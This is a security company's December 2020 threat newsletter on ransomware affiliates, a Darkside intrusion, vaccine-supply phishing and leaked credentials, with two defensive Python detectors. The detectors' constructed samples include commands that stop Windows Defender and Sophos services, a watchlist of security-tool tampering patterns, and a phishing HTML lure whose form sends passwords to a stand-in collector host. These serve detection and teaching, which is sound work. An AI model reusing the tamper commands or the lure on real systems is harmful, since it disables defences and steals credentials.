Cyber Defence Report - December 2020

The last report of what has been a crazy year in cyber security. Our Incident Response team has been busier than ever, and we are seeing ransomware attacks increasing by the day. Ransomware groups like Conti, Egregor, Ryuk and Darkside are attacking customers on a daily basis, and the technical skill applied to the initial intrusion is becoming more sophisticated with each attack.

Many of the groups above operate affiliate sites that allow certain elements of the attack to be outsourced to third parties who share the bounty if the ransom is paid. 

Here's how such affiliate programs work: ransomware operators provide crypto-locking malware code to third parties (the affiliates). Each affiliate receives a build of the code with their unique ID embedded, so the operator can tell which affiliate compromised a given victim. For every victim that pays a ransom, the affiliate shares the take with the ransomware operator.

Darkside ransom note (source: Bleeping Computer)

Darkside's terms and conditions state that their average payments to their affiliates are about $400,000 and the share paid to affiliates is 10% to 25%, depending on the size of the ransom.

Running an affiliate program like this allows just about anybody to distribute and profit from ransomware. It has also brought highly skilled individuals to the party, especially those whose skill is initial intrusion.

On a recent incident response case we came across the Darkside ransomware. CyberGuard's investigation showed that even though the customer used certificates to control access to the VPN, the attackers had exploited a vulnerability in an unpatched firewall and stolen the certificates, which gave them access to the network. Once inside, they stopped additional security products and removed the existing anti-virus software before deploying the ransomware.

As we have got better at protecting users from email attacks and turned off vulnerable services such as Remote Desktop Protocol (RDP), attackers have found new ways to penetrate companies; having a firewall and anti-virus is not enough on its own.

Lessons learnt from this attack 

  • Patch everything, not just PCs and servers: the perimeter firewall and VPN appliances are targets too
  • Get a regular penetration test (look at your network the way an attacker would)
  • Invest in 24/7 monitoring (this attack always happens at night, outside normal working hours)
  • Have a robust incident response (IR) and disaster recovery (DR) plan, and make sure both are tested
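The monitoring lesson is only useful if the monitoring looks for the right thing. In the case above, the attackers stopped security products and removed the anti-virus software before running the ransomware, out of hours. That stage leaves an obvious trail in Windows event logs, and a simple correlation rule catches it. The following is an added example of such a rule, not CyberGuard's own tooling: it parses a small constructed log (field layout, hostnames and the list of security product names are assumptions for the example), scores each host for tampering indicators (event 7036 service stopped, event 4688 `sc stop` / `net stop` / `taskkill` against a security service, MsiInstaller event 1034 removing a security product), weights out-of-hours activity higher, and raises an alert when several indicators land on one host within a ten-minute window.

```python
"""
Correlation rule for the defence-evasion stage seen in the Darkside case:
security services stopped and anti-virus removed shortly before ransomware
deployment, typically at night.

Added example, not the original report's or CyberGuard's code. The log
below is constructed to resemble exported Windows events; the line format
"<timestamp> <host> EventID=<id> <fields>" and the hostnames are assumed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one host being prepared for ransomware at 02:13,
# and one host where a helpdesk engineer restarts the print spooler at 09:30.
SAMPLE_LOG = """\
2020-12-04 14:02:11 FS01 EventID=4688 NewProcessName=C:\\Windows\\System32\\svchost.exe CommandLine="svchost.exe -k netsvcs"
2020-12-04 02:13:07 FS01 EventID=7036 Message="The Windows Defender Antivirus Service service entered the stopped state."
2020-12-04 02:13:09 FS01 EventID=4688 NewProcessName=C:\\Windows\\System32\\sc.exe CommandLine="sc stop WinDefend"
2020-12-04 02:13:12 FS01 EventID=4688 NewProcessName=C:\\Windows\\System32\\net.exe CommandLine="net stop SAVService"
2020-12-04 02:13:40 FS01 EventID=1034 Message="Windows Installer removed the product. Product Name: Sophos Endpoint Agent."
2020-12-04 09:30:00 WS17 EventID=7036 Message="The Print Spooler service entered the stopped state."
2020-12-04 09:31:00 WS17 EventID=4688 NewProcessName=C:\\Windows\\System32\\net.exe CommandLine="net stop Spooler"
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (\S+) EventID=(\d+) (.*)$")

# Assumed watchlist: substrings identifying security products/services in your estate.
SECURITY_KEYWORDS = ("defender", "windefend", "sophos", "savservice", "mcafee",
                     "symantec", "sentinel", "carbonblack", "crowdstrike", "csagent", "sysmon")

# Commands used to stop, delete or reconfigure a service, or kill a process.
TAMPER_CMD_RE = re.compile(r"\b(sc|net)(\.exe)?\s+(stop|delete|config)\b|\btaskkill\b")


def classify(event_id, fields):
    """Return (indicator name, weight) if the event looks like security tampering, else None."""
    text = fields.lower()
    touches_security = any(k in text for k in SECURITY_KEYWORDS)
    if event_id == 7036 and "stopped state" in text and touches_security:
        return ("security_service_stopped", 2)
    if event_id == 4688 and TAMPER_CMD_RE.search(text) and touches_security:
        return ("security_tamper_command", 2)
    if event_id == 1034 and touches_security:          # MsiInstaller: product removed
        return ("security_product_removed", 3)
    return None


def detect(log_text, window=timedelta(minutes=10), threshold=5):
    """Group tampering indicators per host inside a time window and alert above threshold."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        host, event_id, fields = m.group(2), int(m.group(3)), m.group(4)
        hit = classify(event_id, fields)
        if hit is None:
            continue
        name, weight = hit
        if ts.hour >= 22 or ts.hour < 6:                  # out of hours: weight it higher
            name, weight = name + "+out_of_hours", weight + 1
        hits[host].append((ts, name, weight))

    alerts = []
    for host, events in hits.items():
        events.sort()
        i = 0
        while i < len(events):
            start = events[i][0]
            cluster = [e for e in events[i:] if e[0] - start <= window]
            score = sum(w for _, _, w in cluster)
            if score >= threshold:
                alerts.append({"host": host, "start": start, "score": score,
                               "indicators": [n for _, n, _ in cluster]})
            i += len(cluster)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(f"{alert['host']} at {alert['start']}: score {alert['score']} {alert['indicators']}")
```

Run against the sample, FS01 is flagged with a score of 13 (four indicators, all weighted up for the 02:13 timestamp) while WS17's daytime spooler restart scores nothing, because "Print Spooler" is not on the watchlist. The watchlist and threshold are the knobs to tune: the point of scoring rather than alerting on any single `net stop` is that a lone service stop is routine admin activity, whereas several security services stopping on one host at 2 a.m. is not.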

In other news

Reported targeted attacks on the COVID-19 vaccine supply chain
A phishing campaign suspected of targeting entities associated with the COVID-19 vaccine supply chain has been seen. The emails are fairly well written and contain succinct technical information that corresponds to the spoofed sender's company. Attached to the emails is an HTML file that asks the recipient to "unlock" it by entering their login credentials, which are then captured. While the immediate intent appears to be credential harvesting, the ultimate objective is unconfirmed; possibilities include brokering access to victim networks, Business Email Compromise (BEC) operations, and selling the credentials to other adversaries.
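HTML attachments of this kind share a recognisable structure: a password field, a form (or script) that sends what is typed to a host unrelated to the claimed sender, "unlock" or "verify" wording, and often base64 or escape-sequence obfuscation of the collection URL. The following is an added example of a triage check for mail gateways or analysts, not code from the report or from any vendor named on this page. Both attachments are constructed for the example and the domains (`example-coldchain.test` as the spoofed sender, `collect.example-evil.test` as the collector) are placeholders.

```python
"""
Static triage of an HTML mail attachment for credential-harvesting traits.

Added example, not the original report's code. Both HTML samples are
constructed; the sender domain and collector host are placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SENDER_DOMAIN = "example-coldchain.test"   # assumed: the domain the mail claims to come from

# Constructed lure: "protected document", password field, form posting off-domain,
# base64-encoded copy of the collector URL in script.
PHISH_HTML = """<html><body>
<p>This document is protected. Enter your email password to unlock.</p>
<form method="post" action="https://collect.example-evil.test/auth.php">
  <input type="text" name="user"><input type="password" name="pass">
  <input type="submit" value="Unlock">
</form>
<script>var p=atob("aHR0cHM6Ly9jb2xsZWN0LmV4YW1wbGUtZXZpbC50ZXN0L2F1dGgucGhw");</script>
</body></html>"""

# Constructed benign attachment from the same sender: a schedule with a link to its own portal.
BENIGN_HTML = """<html><body><h1>Shipping schedule</h1>
<table><tr><td>Lot 17</td><td>4 Dec</td></tr></table>
<a href="https://portal.example-coldchain.test/docs">Portal</a>
</body></html>"""


class AttachmentScanner(HTMLParser):
    """Collect password inputs, form targets, inline script and visible text."""

    def __init__(self):
        super().__init__()
        self.password_inputs = 0
        self.form_actions = []
        self.script_chunks = []
        self.text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies through handle_data as well.
        (self.script_chunks if self._in_script else self.text).append(data)


def scan_attachment(html, sender_domain=SENDER_DOMAIN):
    """Return a list of human-readable findings; an empty list means nothing suspicious found."""
    p = AttachmentScanner()
    p.feed(html)
    findings = []
    if p.password_inputs:
        findings.append("password field in attachment")
    for action in p.form_actions:
        host = urlparse(action).hostname or ""
        if host and not host.endswith(sender_domain):
            findings.append(f"form posts to external host {host}")
    script = "".join(p.script_chunks)
    if re.search(r"\batob\(|\bunescape\(|fromCharCode", script):
        findings.append("obfuscated script (base64/escape decoding)")
    body = " ".join(p.text).lower()
    if re.search(r"\b(unlock|verify|sign in)\b", body) and "password" in body:
        findings.append("credential lure wording")
    return findings


if __name__ == "__main__":
    for label, sample in (("lure", PHISH_HTML), ("benign", BENIGN_HTML)):
        print(label, scan_attachment(sample) or "clean")
```

The lure produces four findings and the benign schedule none. Any one finding on its own is weak (plenty of legitimate HTML has a password field); the useful signal is a password field combined with a submission target outside the sender's domain, which is exactly what a credential-harvesting attachment has to do to get the credentials out.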

C-Suite Office 365 credentials advertised on criminal forum 
On 25 November 2020, CrowdStrike Intelligence observed an English-speaking threat actor advertising credentials for C-Suite level personnel on multiple criminal forums. The credentials were advertised at $100 to $1,500 USD depending on the company. The threat actor also expressed interest in logs obtained from information-stealing malware, including Smoke Bot, Raccoon Stealer and AZORult, likely to obtain additional information to sell.

CrowdStrike Intelligence is unable to verify the legitimacy of the credentials at this time. C-Suite credentials, as well as those of personnel dealing with finances and accounts, are particularly useful for criminals looking to engage in Business Email Compromise (BEC), particularly CEO fraud. I checked the list and mine are not on there!

Personal data leaks reveal private pictures of female British athletes
The private pictures of four female British athletes have been posted online following a cyber attack targeting sports stars and celebrities. One of the incidents involved private images being stolen from iCloud, and the process of removing them from the dark net has begun. Accessing and leaking someone's personal data is utterly reprehensible.

Everyone should take steps, where possible, to secure their accounts. Turning on two-factor authentication adds a layer of protection and reduces the likelihood of an account being taken over, even if the password is leaked. A strong password made up of three random words is also a good way to defend your data.

Make sure you protect all those devices you get from Santa this year!

Thanks to Kaspersky, CrowdStrike, NCSC and Bleeping Computer for the intelligence.

Stay safe 
Paul